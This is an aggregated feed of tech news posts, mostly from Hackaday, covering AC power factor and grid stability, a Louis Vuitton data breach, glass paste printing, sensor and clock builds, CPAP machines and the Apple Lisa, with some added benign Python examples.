We tend to think of the power in our homes as something that comes out of the outlet before going into the device that’s being powered. While for DC applications this is essentially true – aside from fights over which way DC current flows – for AC applications the answer is pretty much a “It’s complicated”. After all, the primary reason why we use AC transmission is because transformers make transforming between AC voltages easy, not because an AC grid is easier to manage.
Image showing the instantaneous electric power in AC systems and its decomposition into active and reactive power, when the current lags the voltage by 50 degrees. (Credit: Jon Peli Oleaga)
What exactly happens between an AC generator and an AC load depends on the characteristics of the load. A major part of these characteristics is covered by its power factor (PF), which describes the effect of the load on the AC phase. If the PF is 1, the load is purely resistive and there is no phase shift. If the PF is 0, the load is purely reactive: current still flows, but no net real power is delivered. Most AC-powered devices have a power factor somewhere between 0.5 and 0.99, meaning that they appear as a mixed reactive and resistive load.
The power triangle, showing the relationship between real, apparent and reactive power. (Source: Wikimedia)
PF can be understood in terms of the two components that define AC power, being:

  • Apparent Power (S, in volt-amperes or VA) and
  • Real Power (P, in watts).

The PF is defined as the ratio of P to S (i.e. PF = P / S). Reactive power (Q, in var) is easiest to visualise with the power triangle: P is the adjacent leg, Q the opposite leg and S the hypotenuse of a right triangle, and the angle theta (Θ) between P and S is the phase shift by which the current waveform lags the voltage, so that PF = cos Θ. As the phase shift increases, reactive power increases and, for a given real power, so does the apparent power. Rather than being consumed by the load, reactive power flows back to the generator, which hints at why it is such a problematic phenomenon for grid management.

From the above we can deduce that the PF is 1.0 if S and P have the same magnitude. Although S = V × I (using RMS values) is what the generators on the grid actually have to supply, only P = V × I × cos Θ reaches the load as real power in watts, meaning that reactive power is effectively 'wasted' generating and transmission capacity. How concerning this is to you as a consumer mostly depends on whether you are being billed for watts or VAs consumed, but from a grid perspective this is the motivation behind power factor correction (PFC).

This is where capacitors are useful, as they can correct the low PF on inductive loads like electric motors, and vice versa with inductance on capacitive loads. As a rule of thumb, capacitors create reactive power, while inductors consume reactive power, meaning that for PFC the right capacitance or inductance has to be added to get the PF as close to 1.0 as possible. Since an inductor absorbs the excess (reactive) power and a capacitor supplies reactive power, if both are balanced 1:1, the PF would be 1.0.

Modern switch-mode power supplies include an active power factor correction (PFC) stage: a boost converter that shapes the current drawn from the mains so that it follows the voltage waveform, pushing the PF close to 1.0. The capacitor banks that utilities switch in and out across the network do, at full scale, much the same job.
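The power-triangle arithmetic above, carried through numerically as an added example (this is not code from the original article). It takes RMS voltage, RMS current and the phase angle from the figure (current lagging by 50 degrees), decomposes S into P and Q, and sizes the shunt capacitor that would lift an inductive load's PF to a target value using Q_C = 2πfCV². The 230 V, 50 Hz and 10 A figures are assumed for illustration.

```python
import math


def power_triangle(v_rms, i_rms, phase_deg):
    """Decompose a sinusoidal load into apparent (S, VA), real (P, W) and
    reactive (Q, var) power plus power factor.  phase_deg is the angle by
    which the current lags the voltage (positive = inductive load)."""
    s = v_rms * i_rms
    theta = math.radians(phase_deg)
    p = s * math.cos(theta)
    q = s * math.sin(theta)
    pf = p / s if s else 1.0
    return {"S": s, "P": p, "Q": q, "PF": pf}


def pfc_capacitance(p_watts, pf_old, pf_new, v_rms, freq_hz):
    """Shunt capacitance (farads) that injects enough leading var to raise an
    inductive load of p_watts from pf_old to pf_new at v_rms / freq_hz."""
    if not 0 < pf_old <= pf_new <= 1:
        raise ValueError("need 0 < pf_old <= pf_new <= 1")
    q_old = p_watts * math.tan(math.acos(pf_old))   # var drawn now
    q_new = p_watts * math.tan(math.acos(pf_new))   # var allowed at target PF
    q_c = q_old - q_new                              # var the capacitor supplies
    return q_c / (2 * math.pi * freq_hz * v_rms ** 2)  # from Q_C = 2*pi*f*C*V^2


def pf_after_correction(p_watts, pf_old, cap_farads, v_rms, freq_hz):
    """Resulting PF once cap_farads is placed across the inductive load."""
    q_c = 2 * math.pi * freq_hz * cap_farads * v_rms ** 2
    q_net = p_watts * math.tan(math.acos(pf_old)) - q_c
    return math.cos(math.atan2(q_net, p_watts))


if __name__ == "__main__":
    # Assumed figures: 230 V, 10 A, current lagging by 50 degrees as in the figure
    tri = power_triangle(230.0, 10.0, 50.0)
    print(f"S={tri['S']:.0f} VA  P={tri['P']:.0f} W  Q={tri['Q']:.0f} var  PF={tri['PF']:.3f}")
    c = pfc_capacitance(tri["P"], tri["PF"], 0.95, 230.0, 50.0)
    print(f"capacitor for PF 0.95: {c * 1e6:.1f} uF")
    print(f"PF after correction: {pf_after_correction(tri['P'], tri['PF'], c, 230.0, 50.0):.3f}")
```

For the 50 degree case this gives roughly 2300 VA apparent against 1480 W real, and a capacitor of a few tens of microfarads brings the PF to 0.95; overshooting the capacitance simply turns the load capacitive, which is why `pf_after_correction` uses the magnitude of the net angle.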

Traditional Grids

Magnetically controlled shunt reactor (MCSR). (Credit: Tayosun, Wikimedia)
Based on this essential knowledge, local electrical networks were expanded from a few streets to entire cities. From there it was only a matter of time before transmission lines joined many small grids into a few large ones, with transmission networks soon spanning entire continents. Even so, the basic principles remain the same, and so do the methods available to manage a power grid.

Spinning synchronous generators provide the AC power and, depending on their excitation level, either produce or absorb reactive power. Transformers, being passive inductive devices, always absorb reactive power. Transmission lines, both overhead and underground, produce reactive power from their shunt capacitance when lightly loaded, but overhead lines in particular start absorbing it once their loading exceeds the surge impedance loading.

In order to keep reactive power in the grid to a healthy minimum, capacitive and inductive elements are switched in or out at locations like transmission lines and switchyards. The inductive elements often take the form of shunt reactors (basically single-winding transformers), alongside shunt capacitors and active devices like synchronous condensers, which are effectively synchronous generators run without a prime mover. In locations like substations, tap changers enable fine-grained voltage control to ease the load on nearby transmission lines. Meanwhile, the synchronous generators at thermal plants can be kept spinning and synchronised while producing no real power, providing significant reactive power absorption capacity.

Regardless of the exact technologies employed, these traditional grids are characterized by significant amounts of reactive power creation and absorption capacity. As loads join or leave the grid every time that consumer devices are turned off and on, the grid manager (transmission system operator, or TSO) adjusts the state of these control methods. This keeps the grid frequency and voltage within their respective narrowly defined windows.

Variable Generators


Over the past few years, most newly added generating capacity has come in the form of weather-dependent variable generators that use grid-following converters. These devices take the DC power from, generally, PV solar and wind turbine farms and convert it into AC. They use a phase-locked loop (PLL) to lock onto the grid frequency and phase, and output their current in step with the voltage they measure at their terminals.

Unfortunately, these devices do not provide the reactive power absorption and generation of a synchronous machine, and instead blindly follow the grid frequency and voltage they measure, even if the grid is going through reactive power-induced oscillations. Rather than damping these oscillations and the accompanying voltage swings, the converters amplify them. During the 2025 Iberian Peninsula blackout, this was identified by the Spanish TSO as one of the primary causes.

Ultimately AC power grids depend on solid reactive power management, which is why the European association of TSOs (ENTSO-E) already recommended in 2020 that grid-following converters be replaced with grid-forming converters. These can absorb and generate reactive power, helped by additions such as energy storage, and are overall significantly more useful and robust when it comes to AC grid management.

Although AC no longer rules the roost in transmission networks, with high-voltage DC now the more economical option for long distances, the overwhelming majority of today's power grids still use AC. This means that reactive power management will remain one of the most essential parts of keeping power grids stable and people happy, until the day comes when we all switch back to DC grids, years after the switch to AC was finally completed back in 2007.


hackaday.com/2025/07/22/power-…


Fuga di dati Louis Vuitton: 420.000 clienti coinvolti a Hong Kong


According to guancha.cn and other media, Louis Vuitton recently sent a notice to its customers informing them of a data breach affecting about 420,000 customers in Hong Kong. The leaked data includes names, passport numbers, dates of birth, addresses, email addresses, phone numbers, purchase records and product preferences. Louis Vuitton Hong Kong (LVHK) specified that no payment data was involved and said it promptly notified both the relevant authorities and the affected customers.

Following the incident, Hong Kong's Office of the Privacy Commissioner for Personal Data said it has opened an investigation to establish the facts and to check, among other things, whether the company's notification was late. It should also be noted that Louis Vuitton has already suffered several serious data-security incidents since the start of the year.

According to Lin Yue, chief consultant at Lingyan Management Consulting and a consumer-goods industry analyst, the main causes of these recurring incidents are the luxury brands' habit of collecting excessive amounts of data that is not always necessary, such as passport numbers, combined with protection measures and security technology that are not commensurate with the sensitivity of the data they handle.

Chen Jingjing, founder of Jingjie Interactive, added that this weakness reflects an imbalance between the rapid digitalisation of the luxury sector and still-insufficient investment in cybersecurity: brands are good at communicating exclusivity and craftsmanship, but often neglect the technological foundations needed to protect customer data.

Lin Yue also stressed that a data leak can cause serious harm both to consumers, who are exposed to fraud and harassment, and to the brands themselves, which risk a collapse of trust, legal proceedings and reputational damage. Chen Jingjing observed that for luxury brands data security should become an integral part of the premium experience offered to customers, and should be a priority in long-term corporate strategy.

Finally, as protective measures, Lin Yue advised consumers to limit the amount of personal data they share with brands and to change their passwords regularly. For companies, he suggested treating data as a fundamental intangible asset and adopting more advanced protection technology, such as dynamic passwords for CRM systems and restrictions on out-of-hours access, to genuinely consolidate customer trust.

The article Fuga di dati Louis Vuitton: 420.000 clienti coinvolti a Hong Kong comes from il blog della sicurezza informatica.


Paste Extrusion for 3D Printing Glass and Eggshells


A variety of red and black glass objects are shown on a white background. In the foreground, there are two black spiral-patterned earrings. To the left is a red and black shape with three points on the top. On the right, a deformed glass sheet is shown bent over concentric red and black glass rings. In the center top is a red glass vase with a roughly-textured exterior.

In contrast to the success of their molten-plastic cousins, paste extrusion 3D printers have never really attained much popularity. This is a shame because, as the [Hand and Machine] research group at the University of New Mexico demonstrate, you can use them to print with some really interesting materials, including glass and eggshell (links to research papers, with presentations in the supplemental materials).

To print with glass, the researchers created a clay-like paste out of glass frit, methyl cellulose and xanthan gum as shear-thinning binders, and water. They used a vacuum chamber to remove bubbles, then extruded the paste from a clay 3D printer. After letting the resulting parts dry, they fired them in a kiln at approximately 750 ℃ to burn away the binder and sinter the frit. This introduced some shrinkage, but it was controllable enough to at least make decorative parts, and it might be predictable enough to make functional parts after some post-processing. Path generation for the printer was an interesting problem; the printer couldn’t start and stop extrusion quickly, so [Hand and Machine] developed a custom slicer to generate tool paths that minimize material leakage. To avoid glass walls collapsing during firing, they also wrote another slicer to maintain constant wall thicknesses.

The process for printing with eggshell was similar: the researchers ground eggshells into a powder, mixed this with water, methyl cellulose and xanthan gum, and printed with the resulting paste. After drying, the parts didn’t need any additional processing. The major advantage of these parts is their biodegradability, as the researchers demonstrated by printing a biodegradable pot for plants. To be honest, we don’t think that this will be as useful an innovation for hackers as the glass could be, but it does demonstrate the abilities of paste extrusion.

The same team has previously used a paste printer to 3D print in metal. If you don’t have a paste printer, it’s also possible to print glass using a laser cutter, or you could always make your own paste extruder.


hackaday.com/2025/07/22/paste-…


Floating Buoy Measures Ocean Conditions


Out on Maui, [rabbitcreek] desired to keep track of local ocean conditions. The easiest way to do that was by having something out there in the water to measure them. Thus, they created a floating ocean sensor that could report back on what’s going on in the water.

The build uses a Xiao ESP32-S3 as the brains of the operation. It’s paired with a Wio-SX1262 radio kit, which sends LoRa signals over longer distances than is practical with the ESP32’s onboard WiFi and Bluetooth connections. The microcontroller is hooked up with a one-wire temperature sensor, a DF Robot turbidity sensor, and an MPU6050 gyroscope and accelerometer, which allow it to measure the water’s condition and the motion of the waves. The whole sensor package is wrapped up inside a 3D printed housing, with the rest of the electronics in a waterproof Pelican case.

It’s a neat project that combines a bunch of off-the-shelf components to do something useful. [rabbitcreek] notes that the data would be even more useful with a grid of such sensors all contributing to a larger dataset for further analysis. We’ve seen similar citizen science projects executed nicely before, too. If you’ve been doing your own ocean science, don’t hesitate to let us know what you’re up to on the tipsline!


hackaday.com/2025/07/22/floati…


Been a Victim of Extortion on Telegram? Contact Pavel Durov Directly


Pavel Durov, the founder of Telegram, has raised the alarm over a new wave of extortion on the platform. The scammers demand that users hand over valuable digital assets: gifts, and rare Telegram numbers and usernames. These items, previously bought for a few dollars, can now sell for more than $100,000.

According to Durov, there have recently been cases of criminals blackmailing the owners of such assets. In some cases the extortionists threaten to reveal personal or confidential information. Others have turned the practice into a racket: they publish compromising posts and then demand payment to remove them.

"This is illegal and immoral. We will not tolerate it," Durov said on his official channel. He stressed that Telegram will fight this behaviour and delete the accounts involved.

Victims of extortion are asked to gather evidence and send it directly to Pavel Durov by private message. However, as Telegram's founder himself explained, not everyone can do so because of the paywall on messages to his account. He noted that when it is switched off, incoming messages exceed thousands per minute, so he physically has no time to read them.

Durov therefore suggested an alternative: contact Telegram's official support via the @notoscam account, adding the hashtag #blackmail to the message. This helps route the complaint quickly to the right moderator.

The article Sei stato vittima di estorsione su telegram? Contatta Direttamente Pavel Durov comes from il blog della sicurezza informatica.


Coleco Adam: A Commodore 64 Competitor, Almost


A Coleco Adam console on a desk

For a brief, buzzing moment in 1983, the Coleco Adam looked like it might out-64 the Commodore 64. Announced with lots of ambition, this 8-bit marvel promised a complete computing package: a keyboard, digital storage, printer, and all for under $600. An important fact was that it could morph your ColecoVision into a full-fledged CP/M-compatible computer. So far this sounds like a hacker’s dream: modular, upgradeable, and… misunderstood.

The reality was glorious chaos. The Adam used a daisy-wheel printer as a power supply (yes, really), cassettes that demagnetized themselves, and a launch delayed into oblivion. Yet beneath the comedy of errors lurked something quite tempting: a Z80-based system with MSX-like architecture and just enough off-the-shelf parts to make clone fantasies plausible. Developers could have ported MSX software in weeks. Had Coleco shipped stable units on time, the Adam might well have eaten the C64’s lunch – while inspiring a new class of hybrid machines.

Instead, it became a collector’s oddball. But for the rest of us, it is a retro relic that invites us to ponder – or even start building: what if modular computing had gone mainstream in 1983?


hackaday.com/2025/07/21/coleco…


Testing Your Knowledge of JavaScript’s Date Class


JavaScript is everywhere these days, even outside the browser. Everyone knows that this is because JavaScript is the best programming language, which was carefully assembled by computer experts and absolutely not monkeyed together in five days by some bloke at Netscape in the 90s. Nowhere becomes this more apparent than in aspects like JavaScript’s brilliantly designed Date class, which astounds people to this day with its elegant handling of JavaScript’s powerful type system. This is proudly demonstrated by the JS Date quiz by [Samwho].

Recently [Brodie Robertson] decided to bask in the absolute glory that is this aspect of JavaScript, working his way through the quiz’s 28 questions as his mind gradually began to crumble at the sheer majesty of this class’ elegance and subtle genius. Every answer made both logical and intuitive sense, and left [Brodie] gobsmacked at the sheer realization that such a language was designed by mere humans.

After such a humbling experience, it would only seem right to introduce the new JS convert to the book JavaScript: The Good Parts, to fully prepare them for their new career as a full-stack JS developer.

youtube.com/embed/IRX5TuggMxg?…


hackaday.com/2025/07/21/testin…


A Lockpicking Robot That Can Sense the Pins


Having a robot that can quickly and unsupervised pick any lock with the skills of a professional human lockpicker has been a dream for many years. A major issue with lockpicking robots is however the lack of any sensing of the pins – or equivalent – as the pick works its magic inside. One approach to try and solve this was attempted by the [Sparks and Code] channel on YouTube, who built a robot that uses thin wires in a hollow key, load cells and servos to imitate the experience of a human lockpicker working their way through a pin-tumbler style lock.

Although the experience was mostly a frustrating series of setbacks and failures, it does show an interesting approach to sensing the resistance from the pin stack in each channel. The goal with picking a pin-tumbler lock is to determine when the pin is bound where it can rotate, and to sense any false gates from security pins that may also be in the pin stack. This is not an easy puzzle to solve, and is probably why most lockpicking robots end up just brute-forcing all possible combinations.

Perhaps using a more traditional turner-and-pick approach here, with one or more load cells on the pick and turner, or a design inspired by the very effective Lishi decoding tools, would be more effective. Regardless, the idea of making lockpicking robots more sensitive is a good one, albeit a tough nut to crack. The jobs of YouTube-based lockpicking enthusiasts are still safe from the robots, for now.

Thanks to [Numbnuts] for the tip.

youtube.com/embed/-EqSJTBMepA?…


hackaday.com/2025/07/21/a-lock…


2025 One-Hertz Challenge: It’s Hexadecimal Unix Time


[danjovic] came up with a nifty entry for our 2025 One-Hertz Challenge that lands somewhere between the categories of Ridiculous and Clockwork. It’s a clock that few hackers, if any, could read on sight—just the way we like them around here!

The clock is called Hexa U.T.C, which might give you an idea why this one is a little tricky to parse. It displays the current Unix time in hexadecimal format. If you’re unfamiliar, Unix time is represented as the number of non-leap seconds that have ticked by since 1 January 1970 at 00:00:00 UTC. Even if you can turn the long hex number into decimal in your head, you’re still going to have to then convert the seconds into years, days, hours, minutes, and seconds before you can figure out the actual time.

The build relies on an ESP32-S2 module, paired with a 7-segment display module driven by the TM1638 LED driver and key-scan chip. The ESP32 syncs itself up with an NTP time server, and then spits out the relevant signals to display the current Unix time in hex on the 7-segment displays.

It’s a fun build that your programmer friends might actually figure out at a glance. As a bonus it makes an easy kicking-off point for explaining the Year 2038 problem. We’ve featured other similar Unix clocks before, too. Video after the break.
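The conversion the clock asks its reader to do in their head, plus the Year 2038 rollover mentioned above, as an added example (not [danjovic]'s firmware, which runs on the ESP32). It renders Unix seconds as the eight hex digits the display shows, turns a timestamp back into a UTC date, and shows what a signed 32-bit time_t stores once the count passes 0x7FFFFFFF.

```python
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
INT32_MAX = 0x7FFFFFFF  # last second a signed 32-bit time_t can hold


def unix_to_hex(ts):
    """Unix seconds as the 8 uppercase hex digits shown on the clock."""
    if ts < 0:
        raise ValueError("the clock only shows times after the epoch")
    return f"{ts:08X}"


def hex_to_unix(text):
    """Inverse of unix_to_hex: parse the display back into seconds."""
    return int(text, 16)


def unix_to_utc(ts):
    """Human-readable UTC for a Unix timestamp. Done with timedelta rather than
    fromtimestamp() so that negative values work on every platform."""
    return (EPOCH + timedelta(seconds=ts)).strftime("%Y-%m-%d %H:%M:%S")


def as_int32(ts):
    """What a signed 32-bit time_t actually stores for ts: bit 31 becomes the sign."""
    ts &= 0xFFFFFFFF
    return ts - 0x100000000 if ts > INT32_MAX else ts


def rollover_2038():
    """The Year 2038 problem in one step: the second after INT32_MAX wraps to 1901."""
    last = INT32_MAX
    wrapped = as_int32(last + 1)
    return unix_to_utc(last), unix_to_utc(wrapped)


if __name__ == "__main__":
    now = int(datetime.now(tz=timezone.utc).timestamp())
    print(f"display: {unix_to_hex(now)}  ->  {unix_to_utc(hex_to_unix(unix_to_hex(now)))}")
    before, after = rollover_2038()
    print(f"0x{INT32_MAX:08X} is {before}; one second later a 32-bit time_t reads {after}")
```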

youtube.com/embed/git1te5nhhI?…

2025 Hackaday One Hertz Challenge


hackaday.com/2025/07/21/2025-o…


Freezer Monitoring: Because Ice Cream Is a Dish Best Served Cold


This image created using GPT-4o on Poe using the prompt “picture of an upright freezer connected to a computer for temperature monitoring, together with a graph and an alarm siren. Suitable for a professional blog. Be humorous and use a vintage theme.”

[Scott Baker] wrote in to let us know about his freezer monitor.

After a regrettable incident where the ice cream melted because the freezer failed [Scott] decided that what was called for was a monitoring and alerting system. We enjoyed reading about this hack, and we’ll give you the details in just a tick, but before we do, we wanted to mention [Scott]’s justifications for why he decided to roll his own solution for this, rather than just using the bundled proprietary service from the white goods manufacturer.

We’re always looking for good excuses for rolling our own systems, and [Scott]’s list is comprehensive: no closed-source, no-api cloud service required, can log with high fidelity, unlimited data retention, correlation with other data possible, control over alerting criteria, choice of alerting channels. Sounds fair enough to us!

The single-board computer of choice is the Raspberry Pi Zero 2 W. As [Scott] says, it’s nice to be able to SSH into your temperature monitoring system. The sensor itself is the DS18B20. [Scott] 3D printed a simple case to hold the electronics. The other materials required are a 4.7k resistor and a power cable. The instructions for enabling the 1-wire protocol in Raspbian are documented in INSTALL.md.

When it comes time for programming, [Scott]'s weapon of choice is Go. He uses it to read the file system interface exported by the 1-wire drivers under /sys/bus/w1/devices, and sets the Pi Zero up as an HTTP endpoint for Prometheus to scrape. He uses a library from Sergey Yarmonov to daemonize his monitoring service.

Then he configures his ancient version of Prometheus with the requisite YAML. The Prometheus configuration includes specifications of the conditions that should result in alerts being sent. Once that’s done, [Scott] configures a dashboard in Grafana. He is able to show two charts using the same timescale to correlate garage energy usage with freezer temperatures. Mission accomplished!
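The pieces of that pipeline that are easy to get subtly wrong, as an added example in Python rather than [Scott]'s Go: parsing the w1_slave file the kernel exposes for a DS18B20 (the CRC verdict on the first line must be checked before trusting the t= value on the second), emitting the reading in the Prometheus text exposition format, and a small evaluator that mimics an alert rule with a 'for' clause so one bad sample does not page anyone. The sample w1_slave contents, the sensor ID and the metric name are constructed for illustration.

```python
import re

# Constructed samples of /sys/bus/w1/devices/<id>/w1_slave as the w1_therm
# driver formats it: line 1 ends in the CRC verdict, line 2 in t=<millidegrees>.
SAMPLE_OK = (
    "72 01 4b 46 7f ff 0e 10 57 : crc=57 YES\n"
    "72 01 4b 46 7f ff 0e 10 57 t=23125\n"
)
SAMPLE_FROZEN = (
    "a0 fe 4b 46 7f ff 0e 10 3c : crc=3c YES\n"
    "a0 fe 4b 46 7f ff 0e 10 3c t=-22000\n"
)
# Failed read: 85000 is the DS18B20 power-on default, a classic bogus value.
SAMPLE_BAD_CRC = (
    "ff ff ff ff ff ff ff ff ff : crc=c9 NO\n"
    "ff ff ff ff ff ff ff ff ff t=85000\n"
)

_T_RE = re.compile(r"t=(-?\d+)\s*$")


def parse_w1_slave(text):
    """Temperature in degrees C, or None if the bus read failed its CRC."""
    lines = text.strip().splitlines()
    if len(lines) < 2 or not lines[0].endswith("YES"):
        return None
    m = _T_RE.search(lines[1])
    if not m:
        return None
    return int(m.group(1)) / 1000.0


def prometheus_exposition(sensor_id, temp_c):
    """Body of the /metrics response for one gauge sample."""
    return (
        "# HELP freezer_temperature_celsius DS18B20 reading\n"
        "# TYPE freezer_temperature_celsius gauge\n"
        f'freezer_temperature_celsius{{sensor="{sensor_id}"}} {temp_c}\n'
    )


def should_alert(readings, threshold_c=-10.0, for_samples=3):
    """Mimic a Prometheus rule with a 'for' clause: fire only if the last
    for_samples readings are all above threshold or missing (failed reads
    count as bad, since a dead sensor should also page)."""
    recent = readings[-for_samples:]
    if len(recent) < for_samples:
        return False
    return all(r is None or r > threshold_c for r in recent)


if __name__ == "__main__":
    history = [parse_w1_slave(s) for s in (SAMPLE_FROZEN, SAMPLE_OK, SAMPLE_BAD_CRC, SAMPLE_OK)]
    print(prometheus_exposition("28-000005e2fdc3", history[-1]))
    print("alert:", should_alert(history))
```

Treating a failed read as "bad" rather than skipping it is deliberate: the failure mode that actually melts ice cream is a sensor or cable that stops reporting, and a rule that only looks at successful samples would never notice.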

Now that you know how to make a freezer monitor, maybe it’s time to make yourself a freezer.


hackaday.com/2025/07/21/freeze…


Fixing Human Sleep With Air Under Pressure


By and large, the human body is designed to breathe from birth, and keep breathing continuously until death. Indeed, if breathing stops, lifespan trends relatively rapidly towards zero. There’s a whole chunk of the brain and nervous system dedicated towards ensuring oxygen keeps flowing in and carbon dioxide keeps flowing out.

Unfortunately, the best laid plans of our body often go awry. Obstructive sleep apnea is a condition in which a person’s airways become blocked by the movement of soft tissues in the throat, preventing the individual from breathing. It’s a mechanical problem that also has a mechanical solution—the CPAP machine.

Under Pressure

Obstructive sleep apnea occurs when the airway is blocked when muscle tone relaxes during sleep. Credit: public domain
The underlying mechanism of obstructive sleep apnea (OSA) is quite straightforward. During sleep, as the throat, neck, and skeletal muscles all relax, the tongue and/or soft palate can come to block the airway. When this happens, fresh air cannot pass to the lungs, nor can the individual exhale. Breathing is effectively halted, sometimes for minutes at a time. As the individual’s oxygen saturation drops and carbon dioxide levels build up, the brain and nervous system typically trigger an arousal in which the person enters a lighter stage of sleep or wakes up to some degree. The arousal may simply involve a change of position to restore normal breathing, or the individual may wake more fully while gasping for air. Having cleared the airway and resumed normal respiration, the individual generally returns to deeper sleep. As they do, and the muscles relax again, a further obstructive apnea may occur with similar results.

For those suffering from sleep apnea, these arousals can occur many hundreds of times a night. Each disrupts the normal cycles of sleep, generally leading to symptoms of serious sleep deprivation. These arousals often occur without the individual having any awareness they occurred. Sleep apnea can thus easily go undiagnosed, as individuals do not know the cause of their fatigue. In many cases, reports of heavy snoring from sleeping partners are what leads to a sleep apnea diagnosis, as breathing typically becomes louder as the airway slowly closes due to the muscles relaxing during sleep.

Ultimately, the solution to sleep apnea is to stop the airway becoming blocked in the first place, allowing normal breathing to continue all the way through sleep. The problem is that it’s difficult to access the tissues deep in the airway. One might imagine placing some kind of mechanical device into the throat to keep the airway open, but this would be highly invasive. It would also likely pose a choking risk if disrupted during sleep.
The ResMed AirSense 10 Elite, a modern CPAP machine. Note the humidifier attached on the side. This helps reduce instances of dry mouth or similar issues during use. Credit: VSchagow, CC BY-SA 4.0
Enter the CPAP machine—short for “continuous positive airway pressure.” Invented by Australian doctor Colin Sullivan in 1980, the idea behind it is simple—pressurize the individual’s airway in order to hold it open and prevent the tongue and soft tissues from causing a blockage. Air pressures used are relatively low. Machines typically deliver in the range of 4 to 20 cm H2O, which has been found sufficient to keep an airway open during sleep. The CPAP machine doesn’t breathe for the user—it just provides air to the airway at greater than atmospheric pressure.
A Lowenstein Prisma SMART CPAP machine, with hose and mask attached. Credit: Mnalis, CC0
Key to the use of CPAP is how to get the pressurized air inside the airway. Early machines pressurized a large helmet, with an air seal around the neck. Today, modern CPAP machines deliver carefully-controlled pressurized air via a mask. Nasal masks are the least-invasive option, which pressurize the whole airway via the nostrils alone. These masks require that the mouth remain closed during sleep, else the pressurized air is free to leave the airway. Full-face masks, which are similar to those used for other medical procedures, can be used for individuals who need to breathe through their mouth while sleeping.

Overall, a CPAP machine is relatively simple to understand. It consists of a pump to provide pressurized air to the mask, and a user interface for configuring the pressure and other settings. CPAP machines often also feature humidification to stop the supplied air from drying out the user’s mouth and/or nose. This can be paired with heated tubing to warm the air, which avoids condensation from forming in the tube or mask during use. This is called “rainout” and can be unpleasant for the user. Modern machines can also carefully monitor pressure levels and airflow, logging breathing events and other data for later analysis.
A full face mask for use with a CPAP machine. Nasal-only masks are also popular. Credit: public domain
CPAP treatment is not without its issues, however. Users must grow accustomed to wearing a mask while sleeping, as well as adjust to the feeling of breathing in and exhaling out against the continuous incoming pressure from the machine. It’s also important for users to get a suitable mask fit, to avoid issues like skin redness or pressure leaking from the mask. In the latter case, a CPAP machine will be ineffective at keeping an airway open if pressure is lost via leaks. These problems lead to relatively low compliance with CPAP use among those with obstructive sleep apnea. Studies suggest 8% to 15% abandon CPAP use after a single night, while 50% stop using CPAP within their first year. Regardless, the benefits of CPAP machines are well-supported by the available scientific literature. Studies have shown that use of CPAP treatment can reduce sleepiness, blood pressure, and the prevalence of motor vehicle crashes in those with obstructive sleep apnea.

Nobody likes the idea of being semi-woken tens or hundreds of times a night, but for sleep apnea sufferers, that’s precisely what can happen. The CPAP machine is the mechanical solution that provides a good night’s rest, all thanks to a little pressurized air.

Featured image: “wide variety of masks at cpap centra” by [Rachel Tayse]. (Gotta love that title!)


hackaday.com/2025/07/21/fixing…


Don’t Turn That Old System On, First Take it Apart


When you first get your hands on an old piece of equipment, regardless of whether it’s an old PC or some lab equipment, there is often the temptation to stick a power lead into it and see what the happy electrons make it do. Although often this will work out fine, there are many reasons why this is a terrible idea. As many people have found out by now, you can be met by the wonderful smell of a Rifa capacitor blowing smoke in the power supply, or by fascinatingly dangly damaged power wires, as the [Retro Hack Shack] on YouTube found recently in an old Gateway PC.

Fortunately, this video is a public service announcement and a demonstration of why you should always follow the sage advice of “Don’t turn it on, take it apart”. Inside this Gateway 2000 PC from 1999 lurked a cut audio cable, which wasn’t terribly concerning. The bigger problem was a Molex connector that had at some point been violently ripped off, leaving exposed wiring inside the case. The connector and the rest of the wiring were found still attached to the HDD.

Other wires were also damaged, making it clear that the previous owner had tried and failed to remove some connectors, including the front panel I/O wiring. Thankfully, this PC was first torn apart so that the damage could be repaired, but it shows just how easily a ‘quick power-on check’ can turn into something very unpleasant and smelly.

youtube.com/embed/mHWUtvGMhH4?…


hackaday.com/2025/07/21/dont-t…


Why Apple Dumped 2,700 Computers In A Landfill in 1989


In 1983, the Lisa was supposed to be a barnburner. Apple’s brand-new computer had a cutting edge GUI, a mouse, and power far beyond the 8-bit machines that came before. It looked like nothing else on the market, and had a price tag to match—retailing at $9,995, or the equivalent of over $30,000 today.

It held so much promise. And yet, come 1989, Apple was burying almost 3,000 examples in a landfill. What went wrong?

Promise


The Lisa computer, released in 1983, was Apple’s first attempt at bringing a graphical user interface to the masses. The name was officially an acronym for “Local Integrated Software Architecture,” though many believed it was actually named after Steve Jobs’ daughter. In any case, the Lisa was groundbreaking in ways that wouldn’t be fully appreciated until years later.
Had the Lisa succeeded, would we all be using LisaBooks today? Credit: Timothy Colegrove, CC BY-SA 4.0
The Lisa stepped away from the long-lived 6502 CPU that had powered the Apple II line. Instead, it relied upon the exciting new Motorola 68000, with its hybrid 16-bit/32-bit architecture and fast 5 MHz clock speed. The extra power came in handy, as the Lisa was to be one of the first retail computers to be sold with a graphical user interface—imaginatively titled Lisa OS. Forget command lines and character displays—the Lisa had icons and a mouse, all rendered on a glorious 720 x 364 monochrome monitor with rectangular pixels. Adopters of Apple’s new rectangular machine also got twin 5.25-inch double-sided floppy drives, and the Lisa included three expansion slots and a parallel port for adding additional peripherals.

The Lisa seemed to offer a great leap forward in capability, but the same could be said of its price. At launch in 1983, it retailed at $9,995, equivalent to over $30,000 in 2025 dollars. The price was many multiples beyond what you might pay for an IBM PC, making it a tough pill to swallow even given what the Lisa had to offer. The GUI might have been cutting-edge, too, but the implementation wasn’t perfect. The Lisa had a tendency to chug.
It never quite wowed the market, despite Apple’s efforts. Credit: Apple
There was also a further problem. Apple’s very own Steve Jobs may have worked on the Lisa, but he was kicked off the project in 1981, prior to launch. Jobs then jumped ship to the nascent Macintosh development effort, which was initially intended to be a low-cost text-based computer retailing for under $1,000. Jobs swiftly redirected the Macintosh project to make it a GUI-based machine, while retaining the intention to come in at a far more affordable price point than the exorbitantly priced Lisa.

The result was damaging. Just as the Lisa was launching, rumors were already swirling about Apple’s upcoming budget machine. When the Macintosh hit the market in 1984, it immediately blitzed the Lisa in sales. Both machines had a mouse and a GUI, and the Macintosh even had a more forward-looking 3.25-inch floppy drive. True, the Mac wasn’t anywhere near as beefy as the Lisa; most notably, it had just 128K of RAM to the 1MB in Apple’s flagship machine. Ultimately, though, the market voted Mac—perhaps unsurprising given it retailed at $2,495—a quarter of the Lisa’s debut price. Come May, Apple had sold 70,000 units, thanks in part to a legendary commercial directed by Ridley Scott. Meanwhile, it took the Lisa a full two years to sell just 50,000.

